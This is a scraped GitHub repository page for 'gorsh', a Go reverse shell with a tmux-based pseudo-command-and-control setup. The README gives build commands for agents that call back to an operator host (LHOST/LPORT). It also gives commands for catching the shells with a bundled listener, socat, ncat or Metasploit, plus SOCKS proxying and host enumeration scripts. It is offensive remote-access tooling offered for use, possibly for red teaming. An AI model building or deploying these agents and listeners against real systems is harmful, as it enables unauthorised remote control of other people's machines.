Skip to content
A Golang Reverse Shell w/ a Tmux-driven psuedo-C2 Interface
Branch: master
Clone or download
audibleblink remove packr in favor of vfsgen (#33)
* stub function for GOOS with no enum scripts
* show commands as they run
* ignore data.go file generated by vfsgen
* update readme with new build instructions
* update deps
* create embed file for use with `go generate`
* configure enum and sshocks modules to use vfsgen
Latest commit 3f25933 May 15, 2019
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
cmd make conn sharable by extracting it to a module Mar 19, 2019
configs use holeysocks module for socks Feb 1, 2019
docs update changelog Mar 19, 2019
internal
scripts remove packr in favor of vfsgen (#33) May 15, 2019
.gitignore remove packr in favor of vfsgen (#33) May 15, 2019
Dockerfile remove packr in favor of vfsgen (#33) May 15, 2019
LICENSE Create LICENSE Sep 8, 2018
Makefile remove packr in favor of vfsgen (#33) May 15, 2019
README.md remove packr in favor of vfsgen (#33) May 15, 2019
embed.go remove packr in favor of vfsgen (#33) May 15, 2019
go.mod remove packr in favor of vfsgen (#33) May 15, 2019
go.sum remove packr in favor of vfsgen (#33) May 15, 2019

README.md

gorsh

[go]lang [r]everse [sh]ell

forthebadge forthebadge forthebadge forthebadge forthebadge

asciicast

Originally forked from - sysdream/hershell

Fork Changes

Requires go1.11+

See the Changelog

Getting started

git clone git@github.com:audibleblink/gorsh.git

Be sure to read the Makefile. It gives you a good idea of what's going on.

Using the zstd build tag and windll make target require cgo. Make sure you're familiar with cross-compilation and cgo and have the toolchains for it, or read here if you're feeling adventurous.

Usage

First, generate your certs and ssh keys for the reverse proxy.

$ make depends

Follow the make command's printed instructions on creating an ssh user for the reverse proxy connection.

Create configs/ssh.json. There's an example json file the configs directory.

RUN go generate to generate code from static assets that will be embedded in the binary

Generate agents with:

# For the `make` targets, you only need the`LHOST`and`LPORT`environment variables.
$ make {windows,macos,linux}{32,64} LHOST=example.com LPORT=443

Enumeration Scripts

The enum command will present a selection dialog that allows once to run enumeration scripts based on the host OS. You can update scripts in scripts/prepare_enum_scripts.sh and run make enumscripts. Addition of scripts will require modification of ./internal/enum/enum_{windows,linux}.go

Catching the shell

This project ships with a server that catches the reverse shell and still provides shell-like capabilities you lose with traditional reverse shells, including:

  • Tab Completion
  • Vi-mode readline editing
  • History
  • Cursor movements

Generate the server with:

make server
build/srv/gorsh-listen --help

The gorsh-listener is a one-to-one relationship, like a traditional shell. For multiple shells, you need to start multiple servers on different ports.

To have the ability to receive multiple shells on the same port, there's the make listen target. The make listen target kicks off a socat TLS pipe and creates new tmux windows with each new incoming connection. Feed it a port number as PORT. socat is essentially acting as a TLS-terminating reverse proxy. The incoming connections are then handed off to gorsh-listener through randomly generated Unix Domain Sockets.

make listen PORT=8080

# once a client connects, on a different terminal type:
tmux attach -t GORSH

Shells can also be caught without tmux or gorsh-listen using:

  • socat (not working on macos)
  • ncat
  • openssl server module
  • metasploit multi handler (with a python/shell_reverse_tcp_ssl payload)

Examples

$ ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 1234
$ socat stdio OPENSSL-LISTEN:443,cert=server.pem,key=server.key,verify=0

Credits

You can’t perform that action at this time.